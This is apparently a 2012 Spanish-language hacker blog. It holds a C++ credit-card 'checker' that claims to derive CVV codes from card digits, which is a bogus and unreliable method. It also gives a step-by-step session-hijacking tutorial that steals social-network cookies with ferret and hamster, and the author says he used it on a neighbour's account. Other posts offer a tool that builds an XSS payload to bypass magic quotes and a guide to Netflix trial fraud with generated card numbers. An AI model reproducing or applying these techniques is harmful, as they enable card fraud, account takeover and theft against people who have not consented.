29 jun. 2012

Drones vulnerables a Hijacking


Investigadores dicen que terroristas, con el tipo correcto de equipos podrían convertir Drones en armas suicidas.

Un investigador de la Universidad de Texas, ilustra este hecho en una serie de vuelos de prueba recientemente, muestra que spoofeando el GPS podría causar que un Drone se desvie de su curso e incluso provocar un accidente a propósito. Esto es particularmente preocupante, dado que los EE.UU. están tratando de garantizar el espacio aéreo de EE.UU. a los aviones no tripulados para los trabajos domésticos, incluyendo la vigilancia policial o incluso la entrega de FedEx.

En otras palabras, con el equipo adecuado, cualquiera puede tomar el control de un Drone guiado por GPS y hacer que haga lo que sea. Los Spoofers son un tipo mucho más peligroso de tecnología, porque en realidad imitan un comando por el sistema GPS y convencen al Drone que está recibiendo nuevas coordenadas. El Spoofer más avanzado jamás construido (a un costo de sólo $1,000usd) fue capaz de anular la señal desde el espacio con una señal muy potente desde el dispositivo.

17 jun. 2012

CreditCard Checker

Aqui les dejo esta tool codeada por mi en C++ para verificar si una tarjeta de credito es valida o no, hasta ahorita solo reconoce tarjetas de 15 y 16 digitos de las mas usadas que son Visa, Mastercard, American Express y Discover

#include <iostream>
#include <conio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <mmsystem.h>

using namespace std;

class check
{
    private:
            char card[16];
            int par1, par2, par3, par4, par5, par6, par7, par8;
            int impar1, impar2, impar3, impar4, impar5, impar6, impar7, impar8;
            int multimpar1, multimpar2, multimpar3, multimpar4, multimpar5, multimpar6, multimpar7, multimpar8;
            int uni, dec;
            int resultado;

    public:
            void validacion();
            void tipo();
            void american_express();
            void visa();
            void mastercard();
            void discover();
};

void check::validacion()
{
    int lon;
    do
    {
        system("cls");
        cout<<"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="<<endl;
        cout<<" ____ ___ ____ ____ _  _ ___  ____ ____ _  _"<<endl;
        cout<<" ====  |  [__] |--< |\\/| |__> |--| |--< |-:_"<<endl;
        cout<<"     CreditCard Checker by Stormd4rk"<<endl;
        cout<<"============================================="<<endl;
        cout<<"Digita el numero de la tarjeta"<<endl;
        cin>>card;
        lon=strlen(card);
        if(lon != 16 && lon != 15)
        {
            cout<<"Numero invalido"<<endl;
            getch();
        }
    }while(lon != 16 && lon != 15);
    par1=card[1]-'0';
    par2=card[3]-'0';
    par3=card[5]-'0';
    par4=card[7]-'0';
    par5=card[9]-'0';
    par6=card[11]-'0';
    par7=card[13]-'0';
    par8=card[15]-'0';

    impar1=card[0]-'0';
    impar2=card[2]-'0';
    impar3=card[4]-'0';
    impar4=card[6]-'0';
    impar5=card[8]-'0';
    impar6=card[10]-'0';
    impar7=card[12]-'0';
    impar8=card[14]-'0';

    multimpar1=impar1*2;
    multimpar2=impar2*2;
    multimpar3=impar3*2;
    multimpar4=impar4*2;
    multimpar5=impar5*2;
    multimpar6=impar6*2;
    multimpar7=impar7*2;
    multimpar8=impar8*2;

    do
    {
        if(multimpar1 > 9)
        {
            uni = multimpar1 - multimpar1 / 10 * 10;
            dec = (multimpar1 - multimpar1 / 100 * 100) / 10;
            multimpar1=uni+dec;
        }
    }while(multimpar1 > 9);

    do
    {
        if(multimpar2 > 9)
        {
            uni = multimpar2 - multimpar2 / 10 * 10;
            dec = (multimpar2 - multimpar2 / 100 * 100) / 10;
            multimpar2=uni+dec;
        }
    }while(multimpar2 > 9);

    do
    {
        if(multimpar3 > 9)
        {
            uni = multimpar3 - multimpar3 / 10 * 10;
            dec = (multimpar3 - multimpar3 / 100 * 100) / 10;
            multimpar3=uni+dec;
        }
    }while(multimpar3 > 9);

    do
    {
        if(multimpar4 > 9)
        {
            uni = multimpar4 - multimpar4 / 10 * 10;
            dec = (multimpar4 - multimpar4 / 100 * 100) / 10;
            multimpar4=uni+dec;
        }
    }while(multimpar4 > 9);

    do
    {
        if(multimpar5 > 9)
        {
            uni = multimpar5 - multimpar5 / 10 * 10;
            dec = (multimpar5 - multimpar5 / 100 * 100) / 10;
            multimpar5=uni+dec;
        }
    }while(multimpar5 > 9);

    do
    {
        if(multimpar6 > 9)
        {
            uni = multimpar6 - multimpar6 / 10 * 10;
            dec = (multimpar6 - multimpar6 / 100 * 100) / 10;
            multimpar6=uni+dec;
        }
    }while(multimpar6 > 9);

    do
    {
        if(multimpar7 > 9)
        {
            uni = multimpar7 - multimpar7 / 10 * 10;
            dec = (multimpar7 - multimpar7 / 100 * 100) / 10;
            multimpar7=uni+dec;
        }
    }while(multimpar7 > 9);

    do
    {
        if(multimpar8 > 9)
        {
            uni = multimpar8 - multimpar8 / 10 * 10;
            dec = (multimpar8 - multimpar8 / 100 * 100) / 10;
            multimpar8=uni+dec;
        }
    }while(multimpar8 > 9);

    resultado = par1+par2+par3+par4+par5+par6+par7+par8+multimpar1+multimpar2+multimpar3+multimpar4+multimpar5+multimpar6+multimpar7+multimpar8;

    if(resultado%10==0)
    {
        cout<<"=================="<<endl;
        cout<<"Tarjeta Valida! =]"<<endl;
        cout<<"=================="<<endl;
        check::tipo();
    }else
    {
        cout<<"==================="<<endl;
        cout<<"Tarjeta Invalida =("<<endl;
        cout<<"==================="<<endl;
    }
}

void check::tipo()
{
    if(card[0] == '3')
    {
        cout<<"[+]Tipo: American Express"<<endl;
        check::american_express();
    }else
    {
        if(card[0] == '4')
        {
           cout<<"[+]Tipo: Visa"<<endl;
           check::visa();
        }else
        {
            if(card[0] == '5')
            {
                cout<<"[+]Tipo: Mastercard"<<endl;
                check::mastercard();
            }else
            {
                if(card[0] == '6')
                {
                    cout<<"[+]Tipo: Discover"<<endl;
                    check::discover();
                }
            }
        }
    }
}

void check::american_express()
{
    int cid1;
    int cid2;
    int cid3;
    int cid4;
    int x;
    cid1 = card[5]-'0';
    cid2 = card[7]-'0';
    cid3 = card[11]-'0';
    if (card[2]-'0' == 9)
    {
        x = 1;
        cid4 = x;
        cout<<"[+]CID: "<<cid1<<cid2<<cid3<<cid4<<endl;
    }else
    {
        x = card[2]-'0' + 1;
        cid4 = x;
        cout<<"[+]CID: "<<cid1<<cid2<<cid3<<cid4<<endl;
    }
}

void check::visa()
{
    int cvv21;
    int cvv22;
    int cvv23;
    int x;
    cvv21 = card[7]-'0';
    cvv22 = card[11]-'0';
    if (card[2]-'0' == 9)
    {
        x = 1;
        cvv23 = x;
        cout<<"[+]CVV2: "<<cvv21<<cvv22<<cvv23<<endl;
    }else
    {
        x = card[2]-'0' + 1;
        cvv23 = x;
        cout<<"[+]CVV2: "<<cvv21<<cvv22<<cvv23<<endl;
    }
}

void check::mastercard()
{
    int cvc21;
    int cvc22;
    int cvc23;
    int x;
    cvc21 = card[7]-'0';
    cvc22 = card[11]-'0';
    if (card[2]-'0' == 9)
    {
        x = 1;
        cvc23 = x;
        cout<<"[+]CVC2: "<<cvc21<<cvc22<<cvc23<<endl;
    }else
    {
        x = card[2]-'0' + 1;
        cvc23 = x;
        cout<<"[+]CVC2: "<<cvc21<<cvc22<<cvc23<<endl;
    }
}

void check::discover()
{
    int cvv21;
    int cvv22;
    int cvv23;
    int x;
    cvv21 = card[7]-'0';
    cvv22 = card[11]-'0';
    if (card[2]-'0' == 9)
    {
        x = 1;
        cvv23 = x;
        cout<<"[+]CVV2: "<<cvv21<<cvv22<<cvv23<<endl;
    }else
    {
        x = card[2]-'0' + 1;
        cvv23 = x;
        cout<<"[+]CVV2: "<<cvv21<<cvv22<<cvv23<<endl;
    }
}

int main()
{
    SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), 11);
    system ("title CreditCard Checker by StØrMd[4]rk v1.0 [+] cyber-oxyde.blogspot.mx");
    char op;
    do
    {
        system("cls");
        check obj;
        obj.validacion();
        cout<<"Repetir? y/n"<<endl;
        cin>>op;
        op = tolower(op);
    }while(op == 'y');
    MessageBox(NULL,TEXT("I hate lammers.\nstormdark-nxt@live.jp"),TEXT("[Info]"),MB_OK | MB_ICONASTERISK );
}

Saludos..
..By StØrMd[4]rk

15 jun. 2012

Tunel SSH en Linux

Bueno, en este post explicare como hacer ssh tuneling en una plataforma linux, para empezar necesitamos crearnos una cuenta (free) en la siguiente pagina http://www.cjb.net/cgi-bin/shell.cgi?action=signup
Lo siguiente sera instalar PuTTY en nuestra distro, en mi caso Backtrack, tambien necesitaremos la aplicacion Proxychains, en backtrack ya viene instalada pero en otras distribuciones si es necesario descargarla.

Configuracion:
Bien ya que tengamos listo lo anterior, abriremos el archivo de configuracion de Proxychains
root@bt:~# nano /etc/proxychains.conf

y al final del archivo agregaremos: socks5  127.0.0.1 22 y lo guardamos



Seguido de esto abriremos PuTTY y le diremos que se conecte a shell.cjb.net por el puerto 22 


Ahora nos vamos la seccion de SSH -> Tunnels y en source port ponemos 22 y le damos Add dejandolo de la siguiente manera
(Talves necesiten abrir este puerto)



Le damos a Open 


Ponemos el user y el pass con el que nos registramos y nos conectaremos..


Ya solo resta abrir una shell y ejecutar proxychains google-chrome, o bueno, dependiendo del browser que usen, yo abrire opera


Ahora verifiquemos nuestra IP


Y ya somos franceses jejeje xD, lo mejor.. en cada peticion que hagamos nuestra IP sera distinta


Con estos sencillos pasos ya estamos un 80% anonimos >=D

saludos..
By StØrMd[4]rk

13 jun. 2012

Bypass MagicQuotes

Aqui una pequeña herramienta codeada por mi para bypassear el filtro magicquotes
#include <iostream>
#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <windows.h>
#include <mmsystem.h>


using namespace std;

void dow(char *word)
{
    int i = 0, asc, tam = strlen(word);
    do
    {
        asc = (int)word[i];
        i++;
        cout<<asc;
        if(i<tam)
            cout<<',';
    }
    while(i<tam);
}

int main()
{
    char op, word[30];
    system ("title Bypassing MagicQuotes Filters");
    do
    {
        system("cls");
        cout<<" ____ ___ ____ ____ _  _ ___  ____ ____ _  _"<<endl;
        cout<<" ====  |  [__] |--< |\\/| |__> |--| |--< |-:_"<<endl;
        cout<<"          Bypass Magic Quotes T00l\n";
        cout<<"[+]Usage: escribe y da enter xD"<<endl;
        cout<<"_________________________________"<<endl;
        cout<<"\nIntroduce la cadena:"<<endl;
        cout<<"->";
        cin>>word;
        cout<<"\nXSS:"<<endl;
        cout<<"<script>alert(String.fromCharCode(";
        dow(word);
        cout<<"));</script>"<<endl;
        cout<<"\nAgain? s/n"<<endl;
        cout<<"->";
        cin>>op;
        op=tolower(op);
    }
    while(op=='s');
    if (op != 's')
        MessageBox(NULL,TEXT("Coded by StØrMd[4]rk \n\t\nstormdark-nxt@live.jp \n "),TEXT("About"),MB_OK | MB_ICONEXCLAMATION );

    return 0;
}


Code in Github: https://github.com/stormdark/BypassMagicQuotes/blob/master/bypass.cpp

11 jun. 2012

Clonando sesiones de facebook [Session Hijacking]


En este tutorial explicare una manera fácil de clonar sesiones de diferentes redes sociales tales como Twitter, Facebook o lo que caiga estando dentro de una red (ajena xD).
Soft que utilizaremos:

[1] hámster
[2] ferret               http://www.erratasec.com/sidejacking.zip
[3]Cain & Abel     http://www.oxid.it/cain.html
[4] Firefox             http://www.mozilla.com/
[4] Una maquina con Windows

Una ves que tengamos el soft listo en nuestro pc extraemos el contenido de "sidejacking.zip" y lo movemos a C:\ para su fácil acceso.
Antes que nada tenemos que hacer un MITM…pero asumiré que ya saben envenenar la red, asi que me salto esta parte.(Para esto es Cain ehh!)  //candado anti lamm0s para este tuto jejeje

Seguido de esto abrimos una shell y ejecutamos Ferret –W para ver las interfaces que tenemos en nuestro pc:


Yo utilizare mi AlfaNetworks que es la numero 2, entonces escribo:

ferret –i 2

Empezara a sniffear la red y generara un archivo hámster.txt que es donde se van volcando las cookies que va capturando…
Lo siguiente será abrir otra Shell y ejecutar hámster (este no tiene parametros)

hamster



hámster es un proxy y su función es que solo acomoda por medio de links toda la información que hay en hámster.txt (el archivo que genera ferret) y hace mas fácil el acceso a estas.
Lo siguiente será abrir Firefox y configurar un proxy, para esto consulten el archivo de ayuda de hámster ya que el puerto varia a la versión de hámster que tengan, en mi caso tengo que usar el puerto 3128, entonces la configuración quedaría asi:


Una vez hecho esto, solo escribimos en la barra de direcciones http://hamster/ y nos mostrara las cookies volcadas por ferret en hámster.txt de la siguiente manera:


Ahi veremos las cookies que hemos robado y solo resta abrir en otra pestaña el link de assbook, twitter, Hi-5, o de la red social que tengamos las cookies. Yo lo que hago es buscar assbook en google y directamente entrare a la cuenta de mi vecina jejej



Esto es todo, no puse una captura del face de mi vecina porque pueden ir de chismosos jeje =B

Aqui les dejo un video para que vean como funciona   (veanlo en HD)


10 jun. 2012

Netflix Gratis


Bueno de seguro ésto ya lo sabra la mayoria pero para los que aun no saben que onda con el mes gratis de netflix aqui les traigo la forma para saltarse su disque seguridad

Lo unico que tienen que hacer es conseguir de donde sea un numero de tarjeta de credito, en mi caso utilice un generador lo pueden bajar de aqui, tambien hay paginas que generan numeros de tarjetas de credito validas por supuesto


Vamos a la pagina de registro de Netflix y nos pediran varios datos, en donde nos pide el numero de tarjeta insertaremos el numero que nos genera el generador de cc's y donde pide el codigo de seguridad ponemos los ultimos 3 numeros de la tarjeta y los demas datos los inventamos


y eso es todo =3 jejeje




Y bueno eso es para tener un mes gratis pero si nos gusta el servicio podemos hacerle asi cada mes con diferentes cuentas de correo electronico, por ejemplo hay paginas que nos ofrecen correos electronicos temporales como por ejemplo http://10minutemail.com y podemos utilizarlos para que sea mas rapido todo este proceso de registro, yo en este caso caso solo utilice mi cuenta de facebook porque tenia gueva de abrir mi correo xD


StOrMd[4]rk

8 jun. 2012

Hello Fuckin' World

Primer post y haber que sale..

En este blog estare compartiendo alguna info de hack, musica, salvar al planeta, stuff, etc...

Algunos ya me llegan a reconocer en el under pero para los que no, me presento..
Codename: stormdark
Pais: MX
Edad: 20 y contando...
Intereses: Hack, Crack, Phreak, Cyberpunk, 0Days, Music..




Fuck the system!



keep hacking..
=3